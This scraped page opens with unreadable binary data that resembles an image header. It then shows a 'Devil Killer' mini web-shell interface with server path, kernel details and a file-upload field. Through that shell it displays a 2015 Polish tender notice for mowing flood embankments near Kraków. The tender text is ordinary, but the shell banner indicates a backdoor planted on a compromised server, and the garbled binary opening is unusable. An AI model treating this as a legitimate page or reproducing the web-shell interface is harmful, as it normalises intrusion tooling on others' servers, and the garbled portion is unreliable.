JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150326/67400-N-2015.html

<p class="kh_header"><b>Kraków: Usługi zlokalizowane na terenie działalności Inspektoratu Rejonowego w Krakowie woj.małopolskie zgodnie z poszczególnymi częściami zamówienia</b><br>
<b>Numer ogłoszenia: 67400 - 2015; data zamieszczenia: 26.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Zarząd Melioracji i Urządzeń Wodnych Inspektorat Rejonowy w Krakowie , ul. Kraszewskiego 36, 30-110 Kraków, woj. małopolskie, tel. 12 628 09 80, faks 12 628 09 90.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzmiuw.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi zlokalizowane na terenie działalności Inspektoratu Rejonowego w Krakowie woj.małopolskie zgodnie z poszczególnymi częściami zamówienia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część zamówienia nr 5

1.Wykoszenie lewego wału p.pow. rzeki Wisła w km 87+300-88+800, 89+640-90+560, 90+638-91+797, 91+997-95+162, 95+275-101+247 od okolic ul. Klasztornej do ujścia pot.Kościelnickiego m. Kraków , 
gm. Kraków, pow. Kraków
Rozmiar :12,716km 
Zakres prac obejmuje:
Mechaniczne wykoszenie porostów przy użyciu ciągnika i kosiarki bijakowej
Koszenie porostów twardych i gęstych z korony i skarp wału wykaszarkami ręcznymi.
Wygrabienie po ręcznym wykoszeniu.
Uporządkowanie terenu po wykonanych pracach.
2. Wykoszenie prawego wału przeciwpowodziowego rzeka Dłubnia 
w km 0+000 - 1+832 oraz lewego wału przeciwpowodziowego rzeka Dłubnia w km 0+000 - 1+220 Kraków - Nowa Huta , gm. Kraków, 
pow. Kraków
Rozmiar :3,052 km
Zakres prac obejmuje:
mechaniczne (kosiarka bijakowa) i ręczne wykoszenie porostów ze skarp i korony wału
wygrabienie po ręcznym wykoszeniu oraz wywóz
ręczne ścinanie i karczowanie zagajników gęstych rosnących wzdłuż stopy wału wraz z wywozem  i zagospodarowaniem we własnym zakresie
uporządkowanie terenu po wykonanych pracach
3. Wykoszenie prawego wału przeciwpowodziowego potoku Kościelnickiego w km 0+000 - 3+161 oraz prawego wału przeciwpowodziowego  potoku Struga Rusiecka  w km 3+161 - 5+250 Kraków - Nowa Huta  , gm. Kraków, pow. Kraków
Rozmiar :5.250 km
Zakres prac obejmuje:
mechaniczne (kosiarka bijakowa) i ręczne wykoszenie porostów ze skarp i korony wału,
wygrabienie po ręcznym wykoszeniu oraz wywóz
uporządkowanie terenu po wykonanych pracach

Część zamówienia nr 6
1. Konserwacja prawego wału rz. Wisły w km  45+750-52+200, 52+260-56+010, 56+125-57+490 w m. Jaśkowice, Pozowice, Facimiech, Ochodza, Borek Szlachecki, Kopanka, Skawina, gm. Skawina, pow. krakowski
Rozmiar: 11,565 km
Zakres prac obejmuje:
Należy dokonać wykoszenia skarp i korony wałów kosiarką bijakową (90% zakresu robót) oraz wykoszenia skarp w sposób ręczny na odcinkach gdzie użycie kosiarki bijakowej jest niemożliwe (10% zakresu robót) wraz z wygrabieniem ręcznie skoszonych porostów.
2. Konserwacja prawego i lewego wału rz. Skawinki w km 
wał prawy - 0+000-2+750, 3+500-4+200, 7+300-7+890, 8+523-9+500, 
9+657-9+906;
wał lewy - 0+000-1+673, 7+550-8+460, 9+027-9+350;
w m. Skawina, Radziszów, gm. Skawina
Rozmiar: 8.172 km
Zakres prac obejmuje:
Należy dokonać wykoszenia skarp i korony wałów kosiarką bijakową (90% zakresu robót) oraz wykoszenia skarp w sposób ręczny na odcinkach gdzie użycie kosiarki bijakowej jest niemożliwe (10% zakresu robót) wraz z wygrabieniem ręcznie skoszonych porostów.
3.Konserwacja wału rzeki Sosnówki w km 0+000-2+476 wału prawego 
oraz w km 0+000-2+475 wału lewego w m. Facimiech, Wielkie Drogi, 
gm. Skawina, pow. krakowski
Rozmiar: 4.951 km
Zakres prac obejmuje:
Należy dokonać wykoszenia skarp i korony wałów, częściowo międzywala (w sąsiedztwie mostu drogowego - 1,2ha) kosiarką bijakową (90% zakresu) oraz w miejscach gdzie niemożliwa jest praca kosiarki bijakowej ręczne wykoszenie (10%) wraz ze zgrabieniem porostów ze skarp. 

Część zamówienia nr 7

1. Konserwacja  lewego i prawego wału przeciwpowodziowego rzeki Rudawa, prawy wał w km 0+000 - 10+646, lewy wał w km 0+000-9+595, lewy wał 
w km 0+000-0+920  oraz potoku Olszanickiego, prawy wał  w km 0+000-0+160, 
lewy wał w km 0+000-0+180 m. Kraków, gm. Kraków, m. Rząska, Szczyglice, Zabierzów gm. Zabierzów
Rozmiar 21.501 km 
Zakres prac obejmuje:
mechaniczne wykoszenie korony, skarp wału oraz międzywala, porost gęsty twardy, szer. skarpy ponad 2.0m,
ręczne wykoszenie z wygrabieniem porostów twardych ze skarp z wywozem
2. Konserwacja  lewego i prawego wału przeciwpowodziowego potoku Rudno, prawy wał km 0+000-1+068, lewy wał km 0+000-1+162m, Czernichów, gm.Czernichów, pow.krakowski
Zakres prac obejmuje:
mechaniczne wykoszenie korony, skarp wału, porost gęsty twardy, szer. skarpy ponad 2.0m 
3. Konserwacja  lewego i prawego wału przeciwpowodziowego rzeki Sanka, prawy wał km 0+000-4+459, lewy wał  km 0+000-4+371  oraz lewego i prawego wału p.pow. pot.Brzoskwinka, prawy wał km 0+000-0+330, lewy wał km 0+000-0+330, m. Kryspinów, Liszki, Budzyń, Cholerzyn, gm.Liszki, pow.krakowski, m. Kraków, gm.Kraków
Rozmiar: 9.490 km
Zakres prac obejmuje:
mechaniczne wykoszenie korony, skarp wału, porost gęsty twardy, szer. skarpy ponad 2.0m 
4.  Konserwacja  lewego wału przeciwpowodziowego rzeki Wisła
 w km 54+630 - 59+500, 60+180 - 62+655, 64+265 - 64+765 m, Jeziorzany, Ściejowice, Piekary, gm. Liszki, m. Kraków,gm. Kraków
Rozmiar :7.845 km                        
Zakres prac obejmuje:
mechaniczne wykoszenie korony, skarp wału, porost gęsty twardy, szer. skarpy ponad 2.0m 
5. Konserwacja bieżąca lewego wału przeciwpowodziowego rzeki Wisły
w km 36+300-43+770, 43+890-47+059, 47+131-49+361, 49+361-54+630, 
w miejscowościach: Kamień, Rusocice, Kłokoczyn, Czernichów, Wołowice,  gm. Czernichów 
Rozmiar :18.138 km
Zakres prac obejmuje:
mechaniczne wykoszenie porostów ze skarp, korony wału

Część zamówienia nr 8

1. Koszenie prawego i lewego wału rzeki Drwina Długa w m. Kraków - Bieżanów w km : P- 1+260-3+490 L- 1+270-3+724,gm.Kraków,pow.Kraków
Rozmiar : 4.684 km

Zakres prac obejmuje:
mechaniczne i ręczne wykoszenie porostów ze skarp i korony wałów  mechanicznie - kosiarkami bijakowymi - pokos w postaci sieczki pozostawiony na skarpach wału UWAGA: do koszenia należy użyć kosiarek bijakowych - pokos winien mieć postać sieczki.
ręczne ścinanie krzaków ze skarp wału z zagospodarowaniem we własnym zakresie
wyzbieranie i wywóz we własnym zakresie śmieci zalegających miejscowo na wale 
2. Wykoszenie wałów rzeki Wilgi w km 0+000-1+240 - wał prawy i 0+000-1+015 - wał lewy w rejonie ulic: Długosza i Kobierzyńska/Rydlówka 
w Krakowie gm. Kraków pow. Kraków 
Rozmiar :2.225 km
Zakres prac obejmuje:
Wykoszenie porostów traw z korony i skarp wałów oraz międzywala lewego i prawego  : UWAGA: porost należy skosić do postaci sieczki z pozostawieniem na miejscu , w przypadku innej postaci wykoszonego porostu należy go wywieźć z terenu robót na własny koszt .POROST NALEŻY SKOSIĆ DO LUSTRA WODY. UWAGA: BRZEGI RZEKI SĄ UMOCNIONE NARZUTEM KAMIENNYM I KOSZAMI SIATKOWO-KAMIENNYMI.
Wycięcie krzaków o poszyciu gęstym bez karczowania
Wywóz gałęzi i karpiny na odległość do 5 km
Wyzbieranie śmieci z międzywala i wałów wraz z wywozem
3.  Koszenie prawego wału rzeki Wisły w km 79+183-80+703 i 81+193-90+800 odcinek Kraków -Zabłocie-Kraków -Przewóz m. Kraków , 
gm. Kraków, pow. Kraków
Rozmiar:11,127 km 
Zakres prac obejmuje:
mechaniczne i ręczne wykoszenie porostów ze skarp wału kosiarkami bijakowymi - pokos w postaci sieczki pozostawiony na skarpach wału. UWAGA: NALEŻY STOSOWAĆ KOSIARKI KOSZĄCE POROST DO POSTACI SIECZKI !! np. bijakowe .
ręczne ścinanie krzaków ze skarp wału z zagospodarowaniem we własnym zakresie
wyzbieranie i wywóz we własnym zakresie śmieci zalegających miejscowo na skarpach i koronie wału 
4. Koszenie prawego wału rzeki Wisły w km 59+735-61+625,62+030-63+190,63+790-71-771,72+085-72+770,72+845-73+325 odcinek Kraków 
ul. Tyniecka - Grodzisko ujście rzeki Skawinki m. Kraków, gm. Kraków, pow. Kraków
Rozmiar 12.196 km
Zakres prac obejmuje:
mechaniczne i ręczne wykoszenie porostów ze skarp wału kosiarkami bijakowymi - pokos w postaci sieczki pozostawiony na skarpach wału UWAGA: do koszenia należy użyć kosiarek bijakowych - pokos winien mieć postać sieczki.
ręczne ścinanie krzaków ze skarp wału z zagospodarowaniem we własnym zakresie
wyzbieranie i wywóz we własnym zakresie śmieci zalegających miejscowo na wale 

UWAGA oferty częściowe liczba części 4 
Wykonawca może złożyć oferty częściowe maksymalnie na dwie części
zamówienia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wadium:
1.1. Wadium  dla części zamówienia ;Nr 5 
w wysokości 1 000,00 zł (słownie: jeden tysiąc  00/100 zł) 
1.2. Wadium  dla części zamówienia Nr 6
w wysokości 1 000,00 zł (słownie: jeden tysiąc  00/100 zł) 
1.3. Wadium  dla części zamówienia Nr 7
w wysokości 2 500,00 zł (słownie: dwa tysiące  pięćset   00/100 zł) 
1.4. Wadium  dla części zamówienia Nr 8
w wysokości 1 100,00 zł (słownie: jeden tysiąc  sto    00/100 zł) 
należy wnieść przed upływem terminu składania ofert określonym w rozdziale XI pkt.2.
Wadium winno być wniesione w:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z   tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. Nr 42, poz. 275 z 2007 r.)
Wadium wnoszone w pieniądzu należy przelać na rachunek Pekao S.A. nr konta 48 1240 6292 1111 0010 5126 1194.
Wadium w innej formie niż pieniądz należy złożyć w formie oryginału w siedzibie Zamawiającego w Krakowie ul. Kraszewskiego 36 pok.29A
Dowód wpłaty wadium należy dołączyć do oferty. 
1.2 Wadium wnoszone w formie gwarancji lub poręczeń musi spełniać następujące wymogi:
- być wystawione na Małopolski Zarząd Melioracji i Urządzeń Wodnych w Krakowie, 31-153 Kraków ul. Szlak 73,
-zawierać w swej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego zawierające oświadczenie, że zaszła jedna z przesłanek wymienionych w art. 46 ust 4a i/lub ust 5 Ustawy.
- okres ważności wadium nie może być krótszy niż okres związania ofertą.
1.3. Wykonawca który nie zabezpieczy oferty akceptowalną formą wadium zgodnie z zapisami ustawy zostanie wykluczony z prowadzonego postępowania, a jego oferta zostanie odrzucona.
1.4. Zamawiający dokona zwrotu lub zatrzymania wadium zgodnie z art. 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i sposobu oceny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę jeżeli 
a) 1.wykażą ,że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali co najmniej 2 prace w zakresie wykoszenia wałów przeciwpowodziowych o wartości co najmniej 37 000,00 zł. każda dotyczy części zamówienia Nr 5,Nr 6 , z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane świadczenia okresowe lub ciągłe należycie.
a) 2. wykażą ,że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali co najmniej 2 prace w zakresie wykoszenia wałów przeciwpowodziowych o wartości co najmniej 91 000,00 zł. każda dotyczy części zamówienia Nr 7 , z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane/świadczenia okresowe lub ciągłe/ należycie.
a) 3. wykażą ,że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali co najmniej 2 prace w zakresie wykoszenia wałów przeciwpowodziowych o wartości co najmniej 40 000,00 zł. każda dotyczy części zamówienia Nr 8 , z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywaneświadczenia okresowe lub ciągłe należycie.
Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę jeżeli 
wykażą ,że dysponują sprzętem i urządzeniami niezbędnymi 
do wykonania zamówienia a w szczególności; co najmniej 1 kosiarka bijakowa, 1 kosiarka spalinowa , 1 ciągnik 
Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Warunek ten będzie spełniony przez Wykonawce jeżeli wykażą ,że dysponują lub będą dysponować osobami posiadającymi kwalifikacje zawodowe, doświadczenie i wykształcenie i uprawnienia niezbędne do realizacji zamówienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 (Dz. U. z 2013 r., poz. 1409 z późn. zm.) lub odpowiadające im równoważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie kwalifikacje zawodowe uznane na zasadach określonych w przepisach odrębnych oraz ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (t.j. Dz.U. z 2013 r. poz.932) do kierowania pracami na stanowisku: kierownika budowy, który musi posiadać uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej w zakresie budowli melioracji wodnych lub budowli hydrotechnicznych. W przypadku wykonawców zagranicznych, zamawiający dopuścił równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994r. Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008, nr 63, poz. 394 ze zm.) Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i sposobu oceny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony Formularz Oferty 
2. Dokument ustanawiający Pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku, gdy Wykonawcy składają wspólną ofertę, 
3. Stosowne pełnomocnictwo(a) potwierdzające, że dana osoba nie wymieniona w dokumencie rejestracyjnym prowadzonej działalności jest upoważniona do reprezentowania wykonawcy w postępowaniu. 
6. Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia w sytuacji polegania przez Wykonawcę na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów 
